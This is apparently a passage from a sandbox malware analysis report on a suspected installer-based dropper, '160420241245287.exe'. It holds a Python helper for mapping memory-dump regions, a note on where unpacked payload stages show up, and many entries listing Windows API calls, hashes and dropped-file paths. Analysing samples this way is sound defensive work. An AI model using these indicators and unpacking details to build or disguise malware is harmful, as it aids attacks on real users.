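• Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
"""


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    mem_type: int
    dump_id: int
    end: Optional[int]  # assumption: next region's base; None for the highest region

    @property
    def protect_str(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    def contains(self, addr: int) -> bool:
        return self.base <= addr and (self.end is None or addr < self.end)


def parse_dump_names(text: str) -> List[Region]:
    """Return the distinct regions named in `text`, sorted by base address."""
    raw: Dict[int, dict] = {}
    for m in DUMP_RE.finditer(text):
        base = int(m["base"], 16)
        raw.setdefault(base, dict(protect=int(m["protect"], 16),
                                  mem_type=int(m["memtype"], 16),
                                  dump_id=int(m["dumpid"])))
    bases = sorted(raw)
    return [Region(base=b, end=(bases[i + 1] if i + 1 < len(bases) else None), **raw[b])
            for i, b in enumerate(bases)]


def region_for(regions: List[Region], addr: int) -> Optional[Region]:
    """Resolve a `ref:` call-site address to the region that contains it."""
    return next((r for r in regions if r.contains(addr)), None)


def executable_bases(regions: List[Region]) -> List[int]:
    """Bases of regions whose (assumed) protection allows execution."""
    return [r.base for r in regions if r.protect & EXECUTE_MASK]


def memory_map(regions: List[Region]) -> List[str]:
    lines = []
    for r in regions:
        end = f"{r.end:08X}" if r.end is not None else "????????"
        kind = "IMAGE" if r.mem_type == MEM_IMAGE else f"type=0x{r.mem_type:X}"
        lines.append(f"{r.base:08X}-{end} {r.protect_str:<4} {kind} dump={r.dump_id}")
    return lines


if __name__ == "__main__":
    regs = parse_dump_names(SAMPLE)
    print("\n".join(memory_map(regs)))
    for ref in (0x00404172, 0x0040331D, 0x004020BD, 0x0040277F):  # call sites from the API lists
        r = region_for(regs, ref)
        print(f"ref {ref:08X} -> " + (f"{r.base:08X} {r.protect_str}" if r else "unmapped"))
```

Run against the listing above, the only region with an execute bit is 00401000, so every `ref:` address in these function entries resolves to the original code section of the PE image. Code that is unpacked or injected later would show up in the report's subsequent process dumps as additional regions, typically RWX or with a type other than MEM_IMAGE, and that is where to look for the payload stages the detection summary describes.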
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                        • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                        • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                        • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403F29), ref: 0040415B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                        • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                                        • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                                        • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                        • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                        • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                        • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                        • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                        • ShowWindow.USER32(00000000), ref: 004050F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 1638840714-813528018
                                                                        • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                        • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                        • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                        • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                        • lstrcmpiW.KERNEL32(ExecToStack,004226D0,00000000,?,?), ref: 00404731
                                                                        • lstrcatW.KERNEL32(?,ExecToStack), ref: 0040473D
                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                          • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                          • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                        • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                        • String ID: A$C:\Users\user\AppData\Roaming\opbevaringssteder$ExecToStack
                                                                        • API String ID: 2246997448-773504722
                                                                        • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                        • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                        • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                        • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs, xrefs: 004020FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs
                                                                        • API String ID: 542301482-3154209270
                                                                        • Opcode ID: 92aaacdbcca9cd8e92e7536e0d4b0f4a641a28c62365b060c4e49ce7a33acec8
                                                                        • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                        • Opcode Fuzzy Hash: 92aaacdbcca9cd8e92e7536e0d4b0f4a641a28c62365b060c4e49ce7a33acec8
                                                                        • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 5e3acc7ed2542ba51d8a20c3bb224dd4a4199dc3c67067a594cf7fca80444e6d
                                                                        • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                        • Opcode Fuzzy Hash: 5e3acc7ed2542ba51d8a20c3bb224dd4a4199dc3c67067a594cf7fca80444e6d
                                                                        • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                        • GetSysColor.USER32(?), ref: 004043AC
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                        • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                        • SendMessageW.USER32(00000000), ref: 0040444F
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                        • SetCursor.USER32(00000000), ref: 004044CE
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                        • SetCursor.USER32(00000000), ref: 004044F2
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                        • String ID: CB@$ExecToStack$N$open
                                                                        • API String ID: 3615053054-100886567
                                                                        • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                        • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                        • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                        • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C18
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                        • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                          • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                          • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                        • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                        • wsprintfA.USER32 ref: 00405C80
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                          • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
                                                                          • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                        • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                        • API String ID: 1265525490-3322868524
                                                                        • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                        • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                        • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                        • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
